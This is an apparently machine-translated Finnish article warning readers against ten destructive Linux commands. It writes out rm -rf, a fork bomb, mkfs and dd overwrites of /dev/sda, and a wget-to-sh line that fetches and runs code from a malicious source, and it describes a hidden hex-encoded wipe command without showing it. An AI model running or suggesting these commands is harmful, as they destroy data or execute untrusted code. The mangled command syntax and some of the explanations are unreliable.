10 vaarallisinta Linux-komentoa, joita sinun ei pitäisi koskaan suorittaa

10 vaarallisinta Linux-komentoa, joita sinun ei pitäisi koskaan suorittaa
10 vaarallisinta Linux-komentoa, joita sinun ei pitäisi koskaan suorittaa

No, jos olet joskus käyttänyt Linux-käyttöjärjestelmää, saatat tietää, että alusta on itsenäisempi kuin Windows. Linux on avoimen lähdekoodin käyttöjärjestelmä ja se tarjoaa käyttäjille riittävästi vapautta suorittaa erilaisia ​​toimintoja. Ensikertalaisille käyttäjille Linuxin käyttö voi kuitenkin olla haastava tehtävä.

Aivan kuten Windowsissa, Linuxissa on myös paljon päätekomentoja eri toimintojen suorittamiseen. Toisin kuin Windows, Linux ei kuitenkaan kysy sinulta vahvistusta, jos suoritat komennon, joka voi vahingoittaa järjestelmääsi. Joten suosittelemme, että et käytä näitä komentoja hinnalla millä hyvänsä.

10 vaarallisinta Linux-komentoa, joita sinun ei pitäisi koskaan suorittaa

Joten tässä artikkelissa aiomme jakaa joitakin vaarallisia Linux-komentoja, joita sinun ei pitäisi koskaan suorittaa Linuxissa. Joten, katsotaanpa tappavat komennot, joita sinun ei pitäisi koskaan suorittaa Linux-tietokoneessa.

1. rm -rf

Komento rm -rf on yksi nopeimmista tavoista poistaa kansio ja sen sisältö. Mutta pieni kirjoitusvirhe tai tietämättömyys voi johtaa järjestelmän korjaamattomaan vaurioitumiseen. Jotkut rm-komennon kanssa käytetyt vaihtoehdot ovat kuten Rm -r -komento poistaa kansion rekursiivisesti, jopa tyhjän kansion. rm -f -komento poistaa “vain lue tiedoston” kysymättä. Sillä on myös valta poistaa kaikki juurihakemistossa olevat tiedostot.

2.: () {: |: &} ;:

Yllä oleva komento on haarukkapommi. Se toimii määrittelemällä funktion “”, jota kutsutaan kahdesti, kerran etualalla ja kerran taustalla. Se toimii yhä uudelleen ja uudelleen, kunnes järjestelmä jäätyy.

3. command> / dev / sda

Yllä oleva komento kirjoittaa komennon ‘command’ tulosteen lohkoon / dev / sda . Yllä oleva komento kirjoittaa raakadataa ja kaikki lohkon tiedostot korvataan raakatiedoilla, mikä johtaa lohkon tietojen täydelliseen menetykseen.

4. mv directory / dev / null

Tämä komento siirtää periaatteessa kaikki tiedostot kansioon / dev / null, kyllä, se tarkoittaa, että se yksinkertaisesti poistaa kaikki tiedostot järjestelmästä.

5. wget http: // malicious_source -O | sh

Yllä oleva komento lataa komentosarjan haitallisesta lähteestä ja suorittaa sen sitten järjestelmässäsi. Wget-komento lataa komentosarjan ja sh-komento suorittaa ladatun skriptin järjestelmässäsi.

6. Mkfs.ext3 / dev / sda

Yllä oleva komento yksinkertaisesti alustaa lohkon “sda” ja tiedät varmasti, että yllä olevan komennon suorittamisen jälkeen Block (Kiintolevyasema) -asetukseksi palautetaan UUSI! Ilman tietoja, jolloin järjestelmä jää palautumattomaan vaiheeseen.

7. > File

Yllä olevaa komentoa käytetään tiedoston sisällön vapauttamiseen. Jos yllä oleva komento suoritetaan kirjoitusvirheen tai tietämättömyyden kanssa, kuten “> xt.conf” kirjoittaa asetustiedoston tai minkä tahansa muun järjestelmä- tai asetustiedoston.

8. ^ foo ^ bar

Tätä komentoa käytetään edellisen komennon muokkaamiseen ilman, että koko komentoa tarvitsee kirjoittaa uudelleen. Mutta se voi olla todella ongelmallista, jos et ota riskiä tarkistaaksesi alkuperäisen komennon muutosta huolellisesti käyttämällä ^ ^ foo bar -komentoa.

9. dd if = / dev / random of = / dev / sda

Yllä oleva komento päättyy / dev / sda ja kirjoittaa satunnaisia ​​tietoja lohkolle. Tietysti! Järjestelmäsi jää epäjohdonmukaiseen ja korjaamattomaan vaiheeseen.

10. invisible Command

Seuraava komento ei ole muuta kuin tämän artikkelin ensimmäinen komento ( rm-rf ). Täällä koodit on piilotettu hex, jotta tietämätön käyttäjä voi huijata. Suorita alla oleva koodi terminaaliin ja tyhjennä juuriosio.

Tämä komento tässä osoittaa, että uhka voi olla piilotettu ja yleensä havaitsematon joskus. Sinun tulee olla tietoinen siitä, mitä olet tekemässä ja mikä olisi lopputulos. Älä käännä / suorita koodia tuntemattomasta lähteestä.

Joten nämä ovat joitakin vaarallisia Linux-komentoja, joita sinun tulee välttää. Sinun ei pitäisi suorittaa tätä komentoa hinnalla millä hyvänsä. Toivottavasti tämä artikkeli auttoi sinua! Jaa se myös ystäviesi kanssa.

Recent Articles

spot_img

Related Stories

Stay on op - Ge the daily news in your inbox

[tdn_block_newsletter_subscribe input_placeholder="Email address" btn_text="Subscribe" tds_newsletter2-image="730" tds_newsletter2-image_bg_color="#c3ecff" tds_newsletter3-input_bar_display="" tds_newsletter4-image="731" tds_newsletter4-image_bg_color="#fffbcf" tds_newsletter4-btn_bg_color="#f3b700" tds_newsletter4-check_accent="#f3b700" tds_newsletter5-tdicon="tdc-font-fa tdc-font-fa-envelope-o" tds_newsletter5-btn_bg_color="#000000" tds_newsletter5-btn_bg_color_hover="#4db2ec" tds_newsletter5-check_accent="#000000" tds_newsletter6-input_bar_display="row" tds_newsletter6-btn_bg_color="#da1414" tds_newsletter6-check_accent="#da1414" tds_newsletter7-image="732" tds_newsletter7-btn_bg_color="#1c69ad" tds_newsletter7-check_accent="#1c69ad" tds_newsletter7-f_title_font_size="20" tds_newsletter7-f_title_font_line_height="28px" tds_newsletter8-input_bar_display="row" tds_newsletter8-btn_bg_color="#00649e" tds_newsletter8-btn_bg_color_hover="#21709e" tds_newsletter8-check_accent="#00649e" embedded_form_code="YWN0aW9uJTNEJTIybGlzdC1tYW5hZ2UuY29tJTJGc3Vic2NyaWJlJTIy" tds_newsletter="tds_newsletter1" tds_newsletter3-all_border_width="2" tds_newsletter3-all_border_color="#e6e6e6" tdc_css="eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJib3JkZXItY29sb3IiOiIjZTZlNmU2IiwiZGlzcGxheSI6IiJ9fQ==" tds_newsletter1-btn_bg_color="#0d42a2" tds_newsletter1-f_btn_font_family="406" tds_newsletter1-f_btn_font_transform="uppercase" tds_newsletter1-f_btn_font_weight="800" tds_newsletter1-f_btn_font_spacing="1" tds_newsletter1-f_input_font_line_height="eyJhbGwiOiIzIiwicG9ydHJhaXQiOiIyLjYiLCJsYW5kc2NhcGUiOiIyLjgifQ==" tds_newsletter1-f_input_font_family="406" tds_newsletter1-f_input_font_size="eyJhbGwiOiIxMyIsImxhbmRzY2FwZSI6IjEyIiwicG9ydHJhaXQiOiIxMSIsInBob25lIjoiMTMifQ==" tds_newsletter1-input_bg_color="#fcfcfc" tds_newsletter1-input_border_size="0" tds_newsletter1-f_btn_font_size="eyJsYW5kc2NhcGUiOiIxMiIsInBvcnRyYWl0IjoiMTEiLCJhbGwiOiIxMyJ9" content_align_horizontal="content-horiz-center"]